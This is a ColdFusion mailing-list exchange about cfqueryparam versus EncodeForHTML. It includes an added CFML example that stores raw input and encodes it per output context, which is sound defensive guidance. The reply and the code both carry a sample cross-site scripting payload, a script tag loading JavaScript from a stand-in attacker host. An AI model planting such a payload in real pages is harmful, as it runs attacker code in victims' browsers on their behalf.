cfqueryparam and EncodeForHTML are used to prevent two different types of
attack.

cfqueryparam is for SQL injection attacks, as Byron explained.

EncodeForHTML is used to prevent cross-site scripting attacks (it does not
prevent/escape SQL injection), which exist when the attacker can execute
arbitrary client-side code (such as JavaScript). Suppose we specified
companyName=Johnson & Johnson's<script src="//hackers.r.us/badstuff.js">

If you inserted that value into the DB, everyone who views that record in
the DB may potentially execute the hacker's JavaScript file, which can do
lots of things, potentially on behalf of the currently authenticated user.

You don't necessarily need to run EncodeForHTML before inserting the data
into the database; you just need to make sure that you call EncodeForHTML
every time you output the variable. The reason for this is that you can end
up double encoding when you edit the record, or maybe you want to output
the value in another context, such as an HTML attribute; then you want to use
EncodeForHTMLAttribute on the raw value instead. In some apps, though, it can
be a much easier solution to just encode it before inserting the data if it
is output in a million places.

--
Pete Freitag - Adobe Community Professional
http://foundeo.com/ - ColdFusion Consulting & Products
http://hackmycf.com - Is your ColdFusion Server Secure?
http://www.youtube.com/watch?v=ubESB87vl5U - FuseGuard your CFML in 10 minutes


On Mon, Nov 3, 2014 at 3:41 PM, Stephens, Larry V <steph...@iu.edu> wrote:

>
> Text input field
> Entry is Johnson & Johnson's
> I store it in a table using cfqueryparam. All is good.
>
> Let's say the hacked entry is Johnson & Johnson's;delete * (or something
> akin to that - you get the drift). I use cfqueryparam but it won't catch the
> hack; it's still just a string.
>
> At some point, before storing or after retrieval, I use EncodeForHTML to
> make that safe. Now I have either
>
> Johnson &amp; Johnson&#x27;s
>
> or
>
> Johnson &amp; Johnson&#x27;s&#x3b;delete &#x2a;
>
> Supposedly, that's safe. Regex could strip out the "delete" or kill the
> thing when I tried to save the data in the first place, but I tried several
> examples and none seemed to work.
>
> The thing is, Johnson &amp; Johnson&#x27;s may display correctly on the
> screen but it's not good for a search function, particularly if I have a
> legacy database.
>
> To parody a commercial for a different product, what are you using for
> protection?
>
>
> Larry V. Stephen
>
> 
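The following is an added example, not code from Pete's reply or from Larry's original message. It puts the advice above into one page: bind the raw value with cfqueryparam on the way in, search against the raw value, and call the encoder that matches each output context (HTML body, HTML attribute, inline script, URL) on the way out. The datasource name "app", the table companies(id, companyName), and the form fields q and companyName are assumptions for the example; the hostile input is constructed to match the one discussed in the thread.

```cfml
<!--- Added example (not from the original post). Assumes a datasource
      named "app", a table companies(id, companyName), and form fields
      "q" (search term) and "companyName" (edit form). --->

<!--- Constructed hostile input, the same shape as the one in the thread --->
<cfset rawName = "Johnson & Johnson's<script src=""//hackers.r.us/badstuff.js""></script>">

<!--- 1. Persist the RAW string. cfqueryparam binds it as a parameter, so the
      quote, ampersand and angle brackets are data, never part of the SQL.
      No HTML encoding happens here; that is an output-time concern. --->
<cfquery datasource="app">
    INSERT INTO companies (companyName)
    VALUES (<cfqueryparam value="#rawName#" cfsqltype="cf_sql_varchar" maxlength="255">)
</cfquery>

<!--- 2. Search runs against the raw value, so a user typing
      Johnson & Johnson's matches without any entity juggling. --->
<cfquery name="hits" datasource="app">
    SELECT id, companyName
    FROM companies
    WHERE companyName LIKE <cfqueryparam value="%#form.q#%" cfsqltype="cf_sql_varchar">
</cfquery>

<!--- 3. Encode at every output point, choosing the encoder for the context.
      Each encoder turns the ampersand, quote and angle brackets into a form
      that cannot change the structure of that particular context. --->
<cfoutput query="hits">
    <!--- HTML body text --->
    <p>#EncodeForHTML(companyName)#</p>

    <!--- Attribute value on the edit form: raw value in, attribute encoder out.
          Had the value been HTML-encoded before INSERT, this line would
          double-encode it and the user would see the literal entities. --->
    <input type="text" name="companyName" value="#EncodeForHTMLAttribute(companyName)#">

    <!--- Inline script: a different grammar, so a different encoder --->
    <script>var label = "#EncodeForJavaScript(companyName)#";</script>

    <!--- Query-string parameter --->
    <a href="company.cfm?name=#EncodeForURL(companyName)#">details</a>
</cfoutput>
```

The double-encoding caveat from the reply is visible in the edit form: EncodeForHTML("&") yields "&amp;", and applying EncodeForHTML to that result again yields "&amp;amp;", which renders as the literal text "&amp;". Storing the raw value and encoding once per output context avoids both that and the search mismatch Larry describes.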

Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:359562